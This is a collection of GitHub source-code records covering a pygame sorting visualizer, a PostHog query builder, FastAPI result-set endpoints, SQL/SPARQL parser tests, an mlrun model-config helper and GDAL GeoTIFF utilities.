r:\n\t\treturn\n\t\n\tk = randint(l, r - 1)\n\tA[l], A[k] = A[k], A[l]\n\t\n\tm1, m2 = partition_3(A, l, r)\n\tquick_sort(A, l, m1)\n\tquick_sort(A, m2, r)\n\n\ndef partition_3(A, l, r):\n\tpivot = A[l]\n\tj = l\n\tcount = 1\n\tfor i in range(l+1, r):\n\t\tif A[i] < pivot:\n\t\t\tj += 1\n\t\t\tA[i], A[j] = A[j], A[i]\n\t\t\tdraw(A, i, 0.05)\n\t\telif A[i] == pivot:\n\t\t\tcount += 1\n\n\tA[j], A[l] = A[l], A[j]\n\tdraw(A, j, 0.05)\n\treturn j, j + count\n\n\n# -------------------------- Merge Sort\ndef merge_sort(A, l, 
r):\n\tif len(A[l:r]) == 1:\n\t\treturn A[l:r]\n\n\tm = (l + r + 1) // 2\n\n\tA[l:m] = merge_sort(A, l, m)\n\tA[m:r] = merge_sort(A, m, r)\n\n\treturn merge(A, l, m, r)\n\n\ndef merge(A, l, m, r):\n\tarr_l = A[l:m]\n\tarr_r = A[m:r]\n\tresult = []\n\n\twhile arr_l and arr_r:\n\t\tif arr_l[0] < arr_r[0]:\n\t\t\tresult.append(arr_l.pop(0))\n\t\t\tidx = l\n\t\telse:\n\t\t\tresult.append(arr_r.pop(0))\n\t\t\tidx = l + len(arr_l)\n\t\t\t\n\t\tdraw(A[:l]+arr_l+arr_r+result+A[r:], idx, 0.05)\n\n\twhile arr_l:\n\t\tresult.append(arr_l.pop(0))\n\t\tdraw(A[:l]+arr_l+result+A[r:], speed=0.05)  # speed must be passed by keyword; positionally it would be taken as idx\n\t\n\twhile arr_r:\n\t\tresult.append(arr_r.pop(0))\n\t\tdraw(A[:l]+arr_r+result+A[r:], speed=0.05)\n\n\treturn result\n\n\n# -------------------------- Bubble Sort\ndef bubble_sort(A):\n\tfor i in range(len(A)):\n\t\tfor j in range(len(A) - i - 1):\n\t\t\tif A[j] > A[j + 1]:\n\t\t\t\tA[j], A[j + 1] = A[j + 1], A[j]\n\t\t\t\tdraw(A)\n\n\n# -------------------------- Heap Sort\ndef heap_sort(A):\n\tbuild_heap(A)\n\n\tresult = []\n\tfor _ in range(len(A)):\n\t\tA[0], A[-1] = A[-1], A[0]\n\t\tresult.append(A.pop())\n\t\tif A:\n\t\t\tsift_down(A, 0)\n\t\t\n\t\tdraw(A+result, -1, 0.05)\n\treturn result\n\n\ndef build_heap(A):\n\tfor i in reversed(range(len(A) // 2)):\n\t\tsift_down(A, i)\n\n\ndef sift_down(A, i):\n\tcurr = A[i]\n\n\tl = i * 2 + 1\n\tif l < len(A) and A[l] < A[i]:\n\t\tA[l], A[i] = A[i], A[l]\n\n\tr = i * 2 + 2\n\tif r < len(A) and A[r] < A[i]:\n\t\tA[r], A[i] = A[i], A[r]\n\t\tif has_child(A, r):\n\t\t\tsift_down(A, r)\n\n\tif has_child(A, l):\n\t\tsift_down(A, l)\n\n\ndef has_child(A, i):\n\treturn i <= len(A) // 2 - 1\n\t\n\n# --------------------------\ndef draw(A, idx=-1, speed=0):\n\tscreen.fill(WHITE)\n\tcount = 4\n\tfor i, val in enumerate(A):\n\t\tcount += 4\n\t\tp1 = (20 + i + count, HEIGHT)\n\t\tp2 = (20 + i + count, HEIGHT - val)\n\t\tcolor = RED if i == idx else GREY\n\t\tpygame.draw.line(screen, color, p1, p2, 4)\n\tpygame.display.update()\n\tif speed != 0:\n\t\tsleep(speed)\n\n\ndef get_vals():\n\tA = [i * 3 for i in range(150)]\n\tshuffle(A)\n\tB = [i * 3 for i in reversed(range(150))]\n\treturn [A, B]\n\n\n# --------------------------\ndef main():\n\tvals = get_vals()\n\n\twhile True:\n\t\tdraw(vals[0])\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tfor arr in vals:\n\t\t\t\t\t\tdraw(arr)\n\t\t\t\t\t\tsleep(0.5)\n\t\t\t\t\t\t# quick_sort(arr, 0, len(arr))\n\t\t\t\t\t\t# heap_sort(arr)\n\t\t\t\t\t\t# merge_sort(arr, 0, len(arr))\n\t\t\t\t\t\tbubble_sort(arr)\n\t\t\t\t\t\tsleep(1)\n\n\t\t\t\t\tvals = get_vals()\n\n\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\tvals = get_vals()\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","repo_name":"Jiaweihu08/Visualizing-Sorting-Algorithms","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} {"seq_id":"39510802019","text":"from typing import Callable, List, Optional, Dict\n\n\ndef argmax_select(\n    table_name: str,\n    select_fields: Dict[str, List[str]],\n    group_fields: List[str],\n    argmax_field: str,\n    deleted_field: Optional[str] = None,\n):\n    from posthog.hogql import ast\n\n    argmax_version: Callable[[ast.Expr], ast.Expr] = lambda field: ast.Call(\n        name=\"argMax\", args=[field, ast.Field(chain=[table_name, argmax_field])]\n    )\n\n    fields_to_group: 
List[ast.Expr] = []\n fields_to_select: List[ast.Expr] = []\n for name, chain in select_fields.items():\n if name not in group_fields:\n fields_to_select.append(\n ast.Alias(\n alias=name,\n expr=argmax_version(ast.Field(chain=[table_name] + chain)),\n )\n )\n for key in group_fields:\n fields_to_group.append(ast.Field(chain=[table_name, key]))\n fields_to_select.append(ast.Alias(alias=key, expr=ast.Field(chain=[table_name, key])))\n\n select_query = ast.SelectQuery(\n select=fields_to_select,\n select_from=ast.JoinExpr(table=ast.Field(chain=[table_name])),\n group_by=fields_to_group,\n )\n if deleted_field:\n select_query.having = ast.CompareOperation(\n op=ast.CompareOperationOp.Eq,\n left=argmax_version(ast.Field(chain=[table_name, deleted_field])),\n right=ast.Constant(value=0),\n )\n\n return select_query\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/database/argmax.py","file_name":"argmax.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"294376048","text":"\"\"\"Endpoints for Jobs\"\"\"\nfrom typing import Any, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, Security, Response\nfrom sqlalchemy.orm import Session\nfrom starlette.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND\n\nfrom altimeter.qj import schemas\nfrom altimeter.qj.api import deps\nfrom altimeter.qj.crud.crud_result_set import CRUDResultSet\nfrom altimeter.qj.exceptions import (\n JobVersionNotFound,\n ResultSetNotFound,\n ResultSetResultsLimitExceeded,\n ResultSizeExceeded,\n)\nfrom altimeter.qj.notifier import ResultSetNotifier\n\nRESULT_SETS_ROUTER = APIRouter()\n\n\n@RESULT_SETS_ROUTER.get(\"/result_set/{result_set_id}\", response_model=schemas.ResultSet)\ndef get_result_set(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n result_set_id: str,\n result_format: schemas.ResultSetFormat = schemas.ResultSetFormat.json,\n response: Response,\n) -> Any:\n \"\"\"Get a ResultSet by id\"\"\"\n try:\n result_set = result_set_crud.get(db_session, result_set_id=result_set_id)\n response.headers[\"Cache-Control\"] = \"public, max-age=604800, immutable\"\n except ResultSetNotFound as ex:\n raise HTTPException(status_code=HTTP_404_NOT_FOUND, detail=str(ex)) from ex\n if result_format == schemas.ResultSetFormat.csv:\n return Response(content=result_set.to_api_schema().to_csv(), media_type=\"text/csv\")\n return result_set\n\n\n@RESULT_SETS_ROUTER.post(\n \"/result_set\",\n response_model=schemas.ResultSet,\n status_code=HTTP_201_CREATED,\n dependencies=[Security(deps.api_key)],\n)\ndef create_result_set(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_notifier: ResultSetNotifier = Depends(deps.result_set_notifier),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n result_set_in: schemas.ResultSetCreate,\n) -> Any:\n \"\"\"Create a ResultSet\"\"\"\n try:\n result_set = result_set_crud.create(db_session, obj_in=result_set_in)\n if result_set.results:\n if result_set_in.job.notify_if_results:\n result_set_notification = schemas.ResultSetNotification(\n job=result_set_in.job,\n graph_spec=result_set_in.graph_spec,\n created=result_set_in.created,\n num_results=len(result_set_in.results),\n result_set_id=str(result_set.result_set_id),\n )\n result_set_notifier.notify(notification=result_set_notification)\n return result_set\n except (JobVersionNotFound, 
ResultSetResultsLimitExceeded, ResultSizeExceeded) as ex:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST, detail=str(ex)) from ex\n\n\n@RESULT_SETS_ROUTER.get(\n \"/expired\",\n response_model=List[schemas.ResultSet],\n dependencies=[Security(deps.api_key)],\n)\ndef get_expired_result_sets(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n) -> Any:\n \"\"\"Get all expired ResultSets\"\"\"\n return result_set_crud.get_expired(db_session=db_session)\n\n\n@RESULT_SETS_ROUTER.delete(\n \"/expired\",\n response_model=schemas.ResultSetsPruneResult,\n dependencies=[Security(deps.api_key)],\n)\ndef delete_expired_result_sets(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n) -> Any:\n \"\"\"Delete all expired ResultSets\"\"\"\n num_pruned = result_set_crud.delete_expired(db_session=db_session)\n return schemas.ResultSetsPruneResult(num_pruned=num_pruned)\n","repo_name":"tableau/altimeter","sub_path":"altimeter/qj/api/v1/endpoints/result_sets.py","file_name":"result_sets.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"14635890470","text":"from pytest import raises\nfrom rdflib import Variable\n\nfrom mosaicrown.sparql.sparqlparser import extract_object\nfrom mosaicrown.sparql.sparqlparser import extract_predicates\nfrom mosaicrown.sparql.sparqlparser import extract_subject\nfrom mosaicrown.sparql.sparqlparser import parse_SPARQL_query\nfrom mosaicrown.sql.sqlquery import SQLQuery\n\n\n# SELECT\ndef test_select():\n query = \"\"\"\n SELECT student.Id, student.Sex\n FROM student\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Id\", \"Sex\"}}\n\n\ndef test_select_modifier():\n query = \"\"\"\n SELECT DISTINCT student.Ethnicity\n FROM student\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Ethnicity\"}}\n\n\ndef test_select_with_subquery():\n query = \"\"\"\n SELECT student.Id, (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.StudentId = student.Id)\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# FROM\ndef test_cross_join():\n query = \"\"\"\n SELECT student.Id, exam.Date, exam.CourseId, exam.StudentId\n FROM student, exam\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_cross_join_with_subquery():\n query = \"\"\"\n select K.a,K.b\n from (\n select H.b\n from (\n select G.c\n from (\n select F.d\n from (\n select E.e\n from A, B, C, D, E\n ), F\n ), G\n ), H\n ), I, J, K\n \"\"\"\n expectation = {\n \"K\": {\"a\", \"b\"},\n \"H\": {\"b\"},\n \"G\": {\"c\"},\n \"F\": {\"d\"},\n \"E\": {\"e\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join():\n query = \"\"\"\n SELECT student.Sex, exam.Grade\n FROM student INNER JOIN exam\n ON student.Id = exam.StudentId\n \"\"\"\n expectation = {\"student\": {\"Sex\", \"Id\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_multiple_inner_join():\n query = \"\"\"\n select A.a\n from ((A join B on A.id = B.id) join C on A.id = C.id)\n join (D join (E join F on E.id = F.id) on D.id = E.id)\n on A.id = F.id\n join G on A.id = G.id\n \"\"\"\n 
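# Minimal usage sketch of the API under test: get_targets() maps each table
# to the set of columns a query touches, exactly as the assertions in this
# file show.
from mosaicrown.sql.sqlquery import SQLQuery

q = SQLQuery("SELECT student.Id FROM student WHERE student.Sex = 'F'")
assert q.get_targets() == {"student": {"Id", "Sex"}}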
expectation = {\n \"A\": {\"id\", \"a\"},\n \"B\": {\"id\"},\n \"C\": {\"id\"},\n \"D\": {\"id\"},\n \"E\": {\"id\"},\n \"F\": {\"id\"},\n \"G\": {\"id\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join_with_subquery():\n query = \"\"\"\n select A.a\n from (select A.a from A)\n join B on A.a = B.a\n join (select C.c from C) on B.c = C.c\n \"\"\"\n expectation = {\"A\": {\"a\"}, \"B\": {\"a\", \"c\"}, \"C\": {\"c\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_useless_table():\n query = \"\"\"\n SELECT student.Id\n FROM student, exam\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Id\"}}\n\n\n# WHERE\ndef test_where():\n query = \"\"\"\n SELECT student.Id, exam.CourseId\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE exam.Grade > 27\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_where_with_subquery():\n query = \"\"\"\n SELECT exam.CourseId, student.Id\n FROM student JOIN exam as outer_exam\n ON student.Id = exam.StudentId\n WHERE exam.Grade = (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.CourseId = outer_exam.CourseId)\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# GROUP BY ... HAVING ...\ndef test_group_by():\n query = \"\"\"\n SELECT AVG(exam.Grade)\n FROM exam\n GROUP BY exam.CourseId, exam.Date\n \"\"\"\n expectation = {\"exam\": {\"CourseId\", \"Date\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_group_by_having():\n query = \"\"\"\n SELECT AVG(exam.Grade)\n FROM exam\n GROUP BY exam.CourseId, exam.Date\n HAVING COUNT(exam.StudentId) > 100\n \"\"\"\n expectation = {\"exam\": {\"StudentId\", \"CourseId\", \"Date\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# ORDER BY\ndef test_order_by():\n query = \"\"\"\n SELECT student.Id\n FROM student\n ORDER BY student.BirthDate DESC NULLS LAST,\n student.Income ASC NULLS FIRST\n \"\"\"\n expectation = {\"student\": {\"Id\", \"BirthDate\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_order_by_case():\n query = \"\"\"\n SELECT student.Id\n FROM student\n ORDER BY (CASE\n WHEN student.BirthDate IS NULL THEN student.Id\n ELSE student.BirthDate\n END) DESC NULLS LAST, student.Income ASC NULLS FIRST\n \"\"\"\n expectation = {\"student\": {\"Id\", \"BirthDate\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# OPERATIONS\ndef test_operations():\n query = \"\"\"\n SELECT \"CF:\"||professor.Cf,\n 1.5*(professor.Salary+100)-(3)*student.Income\n FROM student\n JOIN exam ON student.Id = exam.StudentId\n JOIN course ON exam.CourseId = course.Cid\n JOIN professor ON course.ProfCf = professor.Cf\n WHERE student.Id = \"12345678\"\n \"\"\"\n expectation = {\n \"student\": {\"Id\", \"Income\"},\n \"exam\": {\"StudentId\", \"CourseId\"},\n \"course\": {\"Cid\", \"ProfCf\"},\n \"professor\": {\"Cf\", \"Salary\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_is_operator():\n query = \"\"\"\n SELECT student.Id\n FROM student\n WHERE student.Ethnicity IS NOT NULL\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_in_operator():\n query = \"\"\"\n SELECT student.Id\n FROM student\n WHERE 
student.Ethnicity IN (\"Asian\", \"Hispanic\")\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# FUNCTIONS\ndef test_std_functions():\n query = \"\"\"\n SELECT COUNT(exam.CourseId)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE student.Id = \"12345678\" AND DATEDIFF(NOW(), exam.Date) < 365\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Date\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_std_functions_modifier():\n query = \"\"\"\n SELECT COUNT(ALL exam.CourseId)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n \"\"\"\n expectation = {\"student\": {\"Id\"}, \"exam\": {\"StudentId\", \"CourseId\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_mosaicrown_functions():\n query = \"\"\"\n SELECT TOKENIZE(student.Id),\n L_DIVERSITY(student.Sex, student.Ethnicity, exam.Grade)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE exam.CourseId = \"DB\" AND DATEDIFF(NOW(), exam.Date) < 365\n \"\"\"\n expectation = {\n \"student\": {\n \"Id\",\n \"Id/tokenize\",\n \"Sex/l_diversity\",\n \"Ethnicity/l_diversity\"\n },\n \"exam\": {\n \"StudentId\",\n \"CourseId\",\n \"Date\",\n \"Grade/l_diversity\"\n }\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# CASE\ndef test_case():\n query = \"\"\"\n SELECT student.Id,\n CASE student.Ethnicity\n WHEN 'Asian' THEN 'Asia'\n WHEN 'Hispanic' THEN 'Latin America'\n ELSE 'Somewhere'\n END\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_case_when():\n query = \"\"\"\n SELECT student.Id,\n CASE\n WHEN student.Income < 1000 THEN 'Nothing'\n WHEN student.Income < 1500 THEN 'Some'\n ELSE 'Maximum'\n END\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# ALIAS\ndef test_select_with_alias():\n query = \"\"\"\n SELECT student.Id BadgeNumber,\n 12.546 AS F,\n \"something\" AS S,\n '' AS EMP, NULL AS N,\n student.Income / 12 AS Monthly,\n YEAR(student.BirthDate) AS YearOfBirth,\n CASE student.Sex\n WHEN 'M' THEN 'Male'\n WHEN 'F' < 1500 THEN 'Female'\n ELSE 'Other'\n END AS FullSex,\n (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.StudentId = student.Id) AS MaxGrade\n FROM student\n \"\"\"\n expectation = {\n \"student\": {\"Id\", \"Income\", \"BirthDate\", \"Sex\"},\n \"exam\": {\"StudentId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_table_alias():\n query = \"\"\"\n SELECT S.Id, E.Date, E.CourseId, E.StudentId\n FROM student S, exam E\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# requires knowledge of the schema\ndef test_cross_join_alias():\n query = \"\"\"\n SELECT SE.Id, SE.Date, SE.CourseId, SE.StudentId\n FROM (student, exam) SE\n \"\"\"\n with raises(Exception,\n match=\"Alias of complex tables is not supported yet.\"):\n SQLQuery(query)\n\n # expectation = {\n # \"student\": {\"Id\"},\n # \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n # }\n # assert SQLQuery(query).get_targets() == expectation\n\n\n# requires knowledge of the schema\ndef test_inner_join_alias():\n query = \"\"\"\n SELECT SE.Sex, SE.Grade\n FROM (student INNER JOIN exam\n ON student.Id = exam.StudentId) SE\n \"\"\"\n with 
raises(Exception,\n                match=\"Alias of complex tables is not supported yet.\"):\n        SQLQuery(query)\n\n    # expectation = {\"student\": {\"Id\", \"Sex\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n    # assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join_with_subquery_alias():\n    query = \"\"\"\n    select AB.b from (select A.a, B.b from A, B) AS AB join C on AB.a = C.a\n    \"\"\"\n    with raises(Exception,\n                match=\"Alias of complex tables is not supported yet.\"):\n        SQLQuery(query)\n\n    # expectation = {\"A\": {\"a\"}, \"B\": {\"b\"}, \"C\": {\"a\"}}\n    # assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_where_with_alias():\n    query = \"\"\"\n    SELECT student.Id BadgeNumber,\n           student.Income / 12 AS Monthly,\n           YEAR(student.BirthDate) AS YearOfBirth,\n           CASE student.Sex\n                WHEN 'M' THEN 'Male'\n                WHEN 'F' < 1500 THEN 'Female'\n                ELSE 'Other'\n           END AS FullSex,\n           (SELECT MAX(exam.Grade)\n            FROM exam\n            WHERE exam.StudentId = student.Id) AS MaxGrade\n    FROM student\n    WHERE BadgeNumber > \"12345678\" AND Monthly > 1000 AND\n          YearOfBirth < 20 AND FullSex IN ('Female', 'Other') AND\n          MaxGrade = 30\n    \"\"\"\n    expectation = {\n        \"student\": {\"Id\", \"Income\", \"BirthDate\", \"Sex\"},\n        \"exam\": {\"StudentId\", \"Grade\"}\n    }\n    assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_aliases_everywhere():\n    query = \"\"\"\n    select C.c AS CC\n    from (select A_T.a AS AA, B_T.b AS BB from A AS A_T, B AS B_T)\n        join C on A.a = C.c\n    where EXISTS(select D_T.d AS DD, E_T.e AS BB from D AS D_T, E AS E_T)\n    \"\"\"\n    expectation = {\"A\": {\"a\"}, \"B\": {\"b\"}, \"C\": {\"c\"}, \"D\": {\"d\"}, \"E\": {\"e\"}}\n    assert SQLQuery(query).get_targets() == expectation\n\n\n# EXTRACT TARGETS FROM SPARQL QUERY\ndef test_simple_SPARQL_parsing():\n\n    example = '''\n    PREFIX dbpedia-owl: <http://dbpedia.org/ontology/>\n    SELECT ?p ?h ?c WHERE {\n    ?p a dbpedia-owl:Artist.\n    ?h dbpedia-owl:birthPlace | dbpedia-owl:district ?c.\n    ?c <http://xmlns.com/foaf/0.1/name> \"York\"@en.\n    FILTER (?p IN (<http://example.org/JohnDoe>, <http://example.org/Jack>)).\n    FILTER (?p < 0.35)\n    }\n    '''\n    # Extraction procedure and parse tree creation\n    where, triples, tree, filters, prefix_dict = parse_SPARQL_query(example)\n\n    # General control on dimension\n    assert len(where) == 3 # 1 triple section + 2 filters\n    assert len(triples) == 3 # 3 triples\n\n    # Expected values\n    subjects = [Variable(\"p\"), Variable(\"h\"), Variable(\"c\")]\n    predicates = [\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\",\n                  \"http://dbpedia.org/ontology/birthPlace OR http://dbpedia.org/ontology/district\",\n                  \"http://xmlns.com/foaf/0.1/name\"]\n    objects = [\"http://dbpedia.org/ontology/Artist\", Variable(\"c\"), \"York\"]\n\n    # Expected filters\n    f_sub = [Variable(\"p\"), Variable(\"p\")]\n    operators = [\"IN\", \"<\"]\n    f_obj = ['http://example.org/JohnDoe, http://example.org/Jack', \"0.35\"]\n\n    # Triples controls\n    for triple in triples:\n        assert extract_subject(triple) == subjects.pop(0)\n        assert extract_predicates(triple, prefix_dict) == predicates.pop(0)\n        assert extract_object(triple, prefix_dict) == objects.pop(0)\n\n    # Filters controls\n    for filter in filters:\n        assert filter[0] == f_sub.pop(0)\n        assert filter[1] == operators.pop(0)\n        assert filter[2] == f_obj.pop(0)\n","repo_name":"mosaicrown/policy-engine","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"23573089977","text":"import json\nfrom importlib import import_module\nfrom inspect import _empty, signature\n\n# for 
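# Illustrative shape of get_class_fit()'s return value for a scikit-learn
# estimator (the exact parameter lists depend on the installed sklearn
# version):
#
#     cfg = get_class_fit("sklearn.ensemble.RandomForestClassifier")
#     cfg["CLASS"]          # constructor defaults, e.g. {"n_estimators": 100, ...}
#     cfg["FIT"]            # fit() defaults, e.g. {"X": None, "y": None, "sample_weight": None}
#     cfg["META"]["class"]  # "sklearn.ensemble.RandomForestClassifier"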
backwards compatibility - can be removed when we separate the hub branches for 0.6.x ad 0.5.x\nfrom .plots import eval_class_model, eval_model_v2 # noqa: F401\n\n\ndef get_class_fit(module_pkg_class: str):\n \"\"\"generate a model config\n :param module_pkg_class: str description of model, e.g.\n `sklearn.ensemble.RandomForestClassifier`\n \"\"\"\n splits = module_pkg_class.split(\".\")\n model_ = getattr(import_module(\".\".join(splits[:-1])), splits[-1])\n f = list(signature(model_().fit).parameters.items())\n d = {}\n for i in range(len(f)):\n d.update({f[i][0]: None if f[i][1].default is _empty else f[i][1].default})\n\n return {\n \"CLASS\": model_().get_params(),\n \"FIT\": d,\n \"META\": {\n \"pkg_version\": import_module(splits[0]).__version__,\n \"class\": module_pkg_class,\n },\n }\n\n\ndef gen_sklearn_model(model_pkg, skparams):\n \"\"\"generate an sklearn model configuration\n\n input can be either a \"package.module.class\" or\n a json file\n \"\"\"\n if model_pkg.endswith(\"json\"):\n model_config = json.load(open(model_pkg, \"r\"))\n else:\n model_config = get_class_fit(model_pkg)\n\n # we used to use skparams as is (without .items()) so supporting both cases for backwards compatibility\n skparams = skparams.items() if isinstance(skparams, dict) else skparams\n for k, v in skparams:\n if k.startswith(\"CLASS_\"):\n model_config[\"CLASS\"][k[6:]] = v\n if k.startswith(\"FIT_\"):\n model_config[\"FIT\"][k[4:]] = v\n\n return model_config\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"mlrun/mlutils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22973556273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 5 01:35:52 2018\n\n@author: ecology\n\"\"\"\n\nimport subprocess\nimport numpy as np\nfrom osgeo import gdal\n\ndef GetUTMTiffCorners(Filedirs):\n if type(Filedirs)==list:\n filedir=Filedirs[0]\n if type(Filedirs)==str:\n filedir=Filedirs\n gdalCMD=\"gdalinfo \"+filedir\n p= subprocess.Popen(gdalCMD,stdout=subprocess.PIPE,shell=True)\n out,err= p.communicate()\n out=str(out)\n upperleft= out[out.find(\"Upper Left\")+15:out.find(\"Upper Left\")+38]\n loweright= out[out.find(\"Lower Right\")+15:out.find(\"Lower Right\")+38]\n sul=upperleft.split(', ')\n slr=loweright.split(', ')\n top=float(sul[1])\n left=float(sul[0])\n right=float(slr[0])\n bottom=float(slr[1])\n print(\"Image data extent get!\")\n return np.array([top,left,right,bottom])\n\ndef ReadTiffAsNumpy(TiffList):\n print(\"Reading GeoTiff files...\")\n total=len(TiffList)\n tmpfiledir=TiffList[0]\n tmp=gdal.Open(tmpfiledir)\n ncol=tmp.RasterXSize\n nrow=tmp.RasterYSize\n Driver=tmp.GetDriver()\n GeoTransform=tmp.GetGeoTransform()\n Proj=tmp.GetProjection()\n OriData=np.zeros([nrow,ncol,total],dtype=np.float32)\n for i in range(total):\n data=gdal.Open(TiffList[i])\n OriData[:,:,i]=data.ReadAsArray().astype(np.float32)\n return [OriData,Driver,GeoTransform,Proj,nrow,ncol]\n\ndef WriteNumpyToTiff(TargetData,Driver,GeoTransform,Proj,nrow,ncol,nanDefault,filedirto,datatype='Float32'):\n if datatype=='Int16': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Int16)\n TargetData=TargetData.astype(np.int16)\n elif datatype=='Int32':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Int32)\n TargetData=TargetData.astype(np.int32) \n elif datatype=='UInt16': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_UInt16)\n 
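# Hypothetical round trip with the two helpers in this module ("in.tif" and
# "out.tif" are placeholder paths, -9999 a placeholder nodata value):
#
#     data, driver, gt, proj, nrow, ncol = ReadTiffAsNumpy(["in.tif"])
#     WriteNumpyToTiff(data[:, :, 0], driver, gt, proj, nrow, ncol,
#                      -9999, "out.tif", datatype="Float32")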
TargetData=TargetData.astype(np.uint16)\n elif datatype=='UInt32':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_UInt32)\n TargetData=TargetData.astype(np.uint32) \n elif datatype=='Float32': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Float32)\n TargetData=TargetData.astype(np.float32)\n elif datatype=='Float64':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Float64)\n TargetData=TargetData.astype(np.float64) \n else:\n print(\"Data type not listed! Please choose from the bellowing:\")\n print(\"Int16 Int32 UInt16 UInt32 Float32 Float64\")\n output.SetGeoTransform(GeoTransform)\n output.SetProjection(Proj)\n outBand=output.GetRasterBand(1)\n# outBand.SetNoDataValue(nanDefault) \n outBand.WriteArray(TargetData,0,0)\n outBand.FlushCache()\n 